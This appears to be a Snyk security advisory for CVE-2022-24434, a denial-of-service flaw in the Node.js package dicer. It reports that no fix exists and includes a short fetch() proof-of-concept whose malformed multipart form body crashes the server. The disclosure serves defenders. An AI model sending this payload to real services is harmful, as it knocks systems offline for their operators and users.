Headline

CVE-2022-24434: Denial of Service (DoS) in dicer | CVE-2022-24434 | Snyk

This affects all versions of package dicer. A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.

2 years ago

CVE

Open in Source

#web #dos #nodejs #js #webkit

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

snyk-id

SNYK-JS-DICER-2311764
published

19 May 2022
disclosed

7 Dec 2021
credit

Aras Abbasi

How to fix?

There is no fixed version for dicer.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.

PoC:

    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '127.0.0.1:8000',
        connection: 'keep-alive',
      },
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
    });

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago